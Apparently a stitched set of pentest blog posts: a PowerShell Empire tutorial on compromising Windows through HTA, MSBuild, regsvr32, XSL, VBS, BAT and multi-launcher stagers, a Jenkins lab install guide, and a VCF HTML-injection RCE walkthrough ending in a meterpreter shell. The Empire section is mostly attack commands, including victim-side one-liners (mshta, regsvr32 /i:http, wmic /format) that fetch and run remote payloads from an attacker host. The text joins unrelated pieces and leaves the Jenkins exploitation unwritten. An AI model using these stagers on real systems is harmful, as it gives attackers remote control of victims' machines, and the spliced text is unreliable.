Multiple Ways to Exploiting Windows PC suing PowerShell Empire

This is our second post in the article series ‘PowerShell Empire’. In this article we will cover all the exploits that leads to windows exploitation with empire. To our first post on empire series, which gives a basic guide to navigate your way through empire, click here.

Table of content:

·         Exploiting through HTA

·         Exploiting through MSBuild.exe

·         Exploiting through regsvr32

·         XSL exploit

·         Exploiting through visual basic script

·         BAT exploit

·         Multi_launcher exploit

Exploiting through HTA

This attack helps us to exploit windows through .hta. when .hta file is run via mshta.exe it executes as .exe file with similar functionality which lets us hack our way through. To know more about this attack please click here.

To run type ‘./Empire’.

According to the work flow, firstly, we have to create a listener to listen on our local machine. Type the following command:

listeners

After running the above command, it will say that “no listeners are currently active” but don’t worry, we are into the listener interface now.  So in this listener interface, type :

uselistener http

set Host http://192.168.1.107

execute

Now that a listener is created, type ‘back’ to go in listener interface to create an exploit. For this, type :

usestager windows/hta

set Listener http

set OutFile /root/1.hta

execute

Running the above commands will create an .hta file to be used as malware. Start the python server using the following command, in order to share our .hta file:

python -m SimpleHTTPServer 8080

As the python server is up and running, type the following command in victims’ command prompt to execute our malicious file:

mshta.exe http:/192.168.1.107:8080/1.hta

The moment above command is executed you will have your session, to access the session type :

interact XDGM6HLE

sysinfo

Exploiting through MSBuild.exe

Our next exploit is via MSBuild.exe, which will let you have a remote session of windows using XML file. To know in details about this attack please click here. And to use this exploit type:

listeners

uselistener http

set Host http:/192.168.1.107

execute

This creates a listener, type ‘back’ to go in listener interface to create a exploit. For this, type :

usestager windows/launcher_xml

set Listener http

execute

Now, an .xml file is created in /tmp. Copy this file in victims’ PC (inside Microsoft.NET\Framework\v4.0.30319\) and run it typing combination of following commands:

cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\

MSBuild.exe launcher.xml

So, this way you will have your session, to access the said session type :

interact A8H14C7L

sysinfo

Exploiting through regsvr32

Our next method is exploiting through regsvr32. To know in detail about this attack, do click here. As always, we have to create a listener first to listen on our local machine. Type the following command:

listeners

uselistener http

set Host http://192.168.1.107

execute

Now that a listener is created, type ‘back’ to go in listener interface to create an exploit. For this, type:

usestager windows/launcher_sct

set Listener http

execute

This will create a .sct file in /tmp. Share this file to victim’s PC using python server and then run this file in run window of victims’ PC by typing the following command:

regsvr /u /n /s /i:http://192.168.1.107:8080/launcher.sct scrobj.dll

Thus, you will have an active session. To access the session type:

interact

sysinfo

Exploiting through XSL

XSL is a language will helps you format data, this also describes how web server will interact with using XML. Our next method of attack with empire is by exploiting .xsl file.  For this method lets activate our listener first by typing :

listeners

uselistener http

set Host http://192.168.1.107

execute

As the listener is up and running, create your exploit :

usestager windows/launcher_xsl

set Listener http

execute

This way .xsl file is created. Now run the python server from the folder where the .xsl file is created as shown in the image below :

cd /tmp

python -m SimpleHTTPServer 8080

Now execute the following command in the command prompt of your victim:

wmic process get brief /format:”http://192.168.1.107:8080/launcher.xsl”

Running above will give a session, to access the session type :

interact

sysinfo

Exploiting through Visual Basic script

Our next method is to create a malicious VBS file and exploiting our victim through it. Like always, let’s create a listener first.

listeners

uselistener http

set Host http://192.168.1.107

execute

Now, to create our malicious .vbs file type :

usestager windows/launcher_vbs

set Listener http

execute

Next step is to start the python server by typing:

python -m SimpleHTTPServer 8080

Once the .vbs file is shared through python server and executed in the victim’s PC you will have you r session and just like before to access the session type :

interact

sysinfo

Exploiting through .bat

In this method, we will exploit through .bat file. Like our previous exploits, this time too, let’s create a listener. For this, type:

listeners

uselistener http

set Host http://192.168.1.107

execute

back

The above commands will create a listener for you. Let’s create our .bat file using following command :

usestager windows/launcher_bat

use Listener http

set OutFile /root/1.bat

execute

As shown, the above commands will create a .bat file. Start up the python server by using following command to allow you share you .bat file on your victim’s pc.

python -m SimpleHTTPServer 8080

Once you run the .bat file, a session will activate. To access the session type:

interact

sysinfo

Multi_launcher

This is our last method of this post. It can be used on various platforms such as windows, linux, etc. again, even for this method, create a listener:

listerners

uselistener http

set Host http://192.168.1.107

execute

Then type following commands for create your malicious file:

 usestager multi/launcher

set listerner http

execute

Once you hit enter after the above commands, it will give you a code. Copy this code and paste it in the command prompt of victim and hit enter. As soon as you hit enter, you will have activated a session. To access the session, type:

interact

sysinfo

Conclusion

The above were the methods that you can use to exploit windows using different vulnerabilities. Using this framework is an addition to your pentesting skills after Metasploit. Enjoy!

Jenkins Pentest Lab Setup

You all know that we have performed so many ctf challenges and we got to know about jenkins there.so lets know about jenkins better. For this we are here with the new challenges which you will face peforming ctf challenges.to do it in a easier way we are here with a new article.so let’s do it.

Table of Content

Introduction of Jenkins

Lab setup

·         Install java

·         Import the GPG keys

·         Add the Jenkins repository

·         Install Jenkins

·         Setup Jenkins

Jenkins penetration testing

Exploiting Groovy Script

Introduction of Jenkins

Jenkins is an open source automation server written in Java that offers a simple way to set up a continuous CI / CD pipeline.  It supports version control tools,including AccuRev, CVS, Subversion, Git, Mercurial, Perforce, TD/OMS, ClearCase and RTC, and can execute Apache Ant, Apache Maven and sbt based projects as well as arbitrary shell scripts and Windows batch commands. The creator of Jenkins is Kohsuke Kawaguch. Jenkins achieves Continuous Integration with the help of plugins. Plugins allows the integration of Various DevOps stages. If you want to integrate a particular tool, you need to install the plugins for that tool. For example: Git, Maven 2 project, Amazon EC2, HTML publisher etc.

Lab setup

Install Java

Now we need to install Jenkins and for this it is mandatory that you are logged in from sudo user or root. Because Jenkins is a Java application, installing Java is the first step. Update the package index and install the OpenJDK Java 8 package using the following commands:

sudo apt update

sudo apt install openjdk-8-jdk

Import the GPG keys

wget -q -O - https://pkg.jenkins.io/debian/jenkins.io.key | sudo apt-key add -

Install Jenkins

When the key is added, the system returns all right. Next, add the Debian package repository to the source list of the server:

sudo sh -c 'echo deb http://pkg.jenkins.io/debian-stable binary/ > /etc/apt/sources.list.d/jenkins.list'

sudo apt update

The Jenkins version with the default Ubuntu packages is often behind the project's latest version. You can use project-maintained packages to install Jenkins to take advantage of the latest fixes and features. Now open the kali terminal and install Jenkins from the given link below-

sudo apt install Jenkins

sudo ufw allow 8080

You can use its status command to check that Jenkins has successfully started.

systemctl status jenkins

Visit Jenkins on its default port 8080 to set up your installation using your server domain name or IP address: http:/your server ip or domain:8080

You should see the Unlock Jenkins screen displaying the location of the initial password:

In the terminal window, you need to use the cat command to display the password:

Copy the password from your terminal

sudo cat /var/lib/jenkins/secrets/initialAdminPassword

Copy the password from your terminal and paste it into the Administrator password field and click Continue.

On the next page, you will be asked if you want to install suggested plugins or if you want to select specific plugins. Click the Install suggested plugins box and start the process of installation plugin instantly.

In my case it took so much time to get all plugin installed successfully. 

Once the installation is completed, you will get another page to create First Admin user account, fill the all essential details and click on “Save and Continue”.

You will see a confirmation page that "Jenkins is ready”. To visit Jenkins main dashboard, click Start using Jenkins Click Save and Finish after confirming the corresponding information.

That’s wonderful! You have successfully installed Jenkins on your system.

Exploiting Windows using Contact File HTML Injection/RCE

After the 0 day exploit on malicious VCF file in windows, cyber security researcher John Page deserves another round of applause for bringing this vulnerability onto exploit-db’s eye on 23^rd January 2019. This vulnerability further exploits the RCE vulnerability present in VCF with HTML injections. To read the previous article follow the link here.

Introduction: The idea here is to include a malicious VBScript file into the email section of the VCF file so as to locally execute a script instead of opening the email via mailto. We’ll be using the anchor tag () of HTML to achieve the aforementioned task. This vulnerability is classified by John under “Mailto: HTML Link Injection Remote Code Execution”. To read more about the discovery and origin, follow the link here.

Methodology: 

·         Making an msfvenom payload of a .vbs format.

·         Sending the VBS file to victim.

·         Creating a VCF file in the parent folder.

·         Adding an email into the contact with HTML injection parameters.

·         Running multi/handler in a separate window.

·         Opening email in the VCF file.

·         Spawning meterpreter.

So, without any further ado, let’s dive right into it.

Proof of Concept:

The first step would be to make a payload with a vbs extension. For this purpose we are using msfvenom’s windows payload but any other payload should work just fine.

In my case, the local IP address is 192.168.1.109

Once the payload is made, transfer the .vbs file into victim’s PC.

Next and the most important step is to make a contact VCF file. You can download a sample VCF too and add a website but we made a new contact file. The system we are using is Windows 10 so the version of VCF file may differ from yours but it would work just the same. Once the contact file is made, under the e-mail tab, add the HTML injection like:

raj@gmail.com

Mind here that our parent folder’s name is “Raj” and the malicious VBS file is “shell.vbs”.

Now you’ll have to add this email address by clicking on the add button. As you can see it would look something like this:

Once the email address gets added, you’ll have to save the contact file. The final VCF file is going to look something like this:

By the aforementioned HTML injection tag, we are prompting a local inclusion instead of a mail prompt. This will run the malicious code and thereby, theoretically would spawn meterpreter. So, as soon as we add the mail in the VCF file, Windows will prompt you like "The e-mail address you have entered is not a valid internet e-mail address. Do you still want to add this address?" Click yes.

When you click on the mail in the final processed VCF file, you’d probably have opened a new meterpreter session.

Conclusion: This is an amazing vulnerability discovered by John Page and all the working versions of windows that support contact VCF files are affected by it. As you can see we have spawned a windows 10 shell here, it is safe to say lower versions are affected too. To read more about the discovery, follow the link to John Page’s website here. Thanks for reading.